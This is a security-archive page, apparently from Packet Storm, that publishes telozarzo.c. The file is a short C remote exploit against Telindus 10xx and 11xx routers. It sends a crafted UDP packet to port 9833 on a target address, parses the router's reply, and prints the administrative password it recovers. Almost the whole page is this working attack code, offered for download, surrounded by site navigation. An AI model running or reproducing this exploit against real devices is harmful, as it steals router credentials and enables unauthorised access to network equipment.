what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

telozarzo.c

telozarzo.c
Posted Jun 28, 2002
Authored by Rubik

Telindus router 10xx and 11xx remote exploit.

tags | exploit, remote
SHA-256 | 404bb0a35d5c7eda3c26b9a45719176438cf8347496440a97caa87b792e26489

telozarzo.c

Change Mirror Download
this is a really-stupid bad-written exploit for telindus router (10xx and
11xx series)
bye,
rubik@olografix.org

/* telozarzo.c */

#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<netinet/udp.h>
#include<arpa/inet.h>
#include<sys/time.h>
#include<string.h>
#include<stdio.h>
#include<signal.h>
#include<unistd.h>
#include<stdlib.h>

#define BUFFER_SIZE 300

struct sockaddr sa;
struct sockaddr sf;
struct sockaddr *from;
struct sockaddr_in *p, *d;
int len;
int fd;
int sent,recvd;
unsigned long start_ip;

char pass[32];
char str[10];
FILE *logfile;

struct timeval minutetimeout;
int TIMEOUT;

int numhost=0, numfound=0;
double per;

u_char data2recv[BUFFER_SIZE];
u_char data2sent[62]={
0x19, 0x73, 0x04, 0x17, 0x73, 0x30, 0x00, 0x01,
0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x01, 0x02,
0x01, 0x33, 0x01, 0x13, 0x01, 0x16, 0x04, 0x08,
0x04, 0x15, 0x01, 0x0D, 0x01, 0x0E, 0x01, 0x14,
0x40, 0x03, 0x40, 0x04, 0x01, 0x26, 0x01, 0x27,
0x01, 0x28, 0x01, 0x30, 0x01, 0x44, 0x42, 0x05,
0x42, 0x22, 0x04, 0x18, 0xFF, 0xFF, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

void func_alarm_telindus (int s) {
close(fd);
return;
}

void exitnow () {
close(fd);
exit(2);
}

int checktelindus (unsigned long ip) {

int i=0;
char *s;

p=(struct sockaddr_in*)&sa;
p->sin_family=AF_INET;
p->sin_port=htons(9833);
p->sin_addr.s_addr= htonl(ip);

d=(struct sockaddr_in*)&sf;
d->sin_family=AF_INET;
d->sin_port=htons(9833);
d->sin_addr.s_addr=INADDR_ANY;

minutetimeout.tv_sec = TIMEOUT;
minutetimeout.tv_usec = 0;

bzero (data2recv, sizeof (data2recv));

fd=socket(AF_INET,SOCK_DGRAM,0);

bind (fd, (struct sockaddr*)d, sizeof (struct sockaddr));
sent=sendto(fd,&data2sent,62,0,(struct sockaddr*)p,sizeof(struct sockaddr));

signal(SIGALRM, func_alarm_telindus);
alarm(TIMEOUT);

if (recvfrom(fd,data2recv,BUFFER_SIZE,0,from,&len)<=0) {
alarm(0);
signal(SIGALRM,SIG_DFL);
bzero (data2recv, sizeof (data2recv));
return(-1);
}

s=data2recv;
while (i<5) {
while ((*(s++)) != '\0'); i++;
}

if (*s == '\0') {
printf ("pw vuota\n");
} else {
strncpy (pass, ++s, strlen(s) -3 );
printf ("pw: = %s \n", pass);
}
alarm(0);
signal(SIGALRM,SIG_DFL);
return (0);
}


void usage (char *cmd) {
printf ("\n%s ip\n", cmd);
exit(1);
}

int main(int argc, char *argv[]) {

if (argc != 2) usage(argv[0]);
start_ip=inet_addr(argv[1]);

signal(SIGINT, exitnow);
signal(SIGTERM, exitnow);
signal(SIGKILL, exitnow);
signal(SIGQUIT, exitnow);

checktelindus (ntohl(start_ip));

return (0);
}



Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close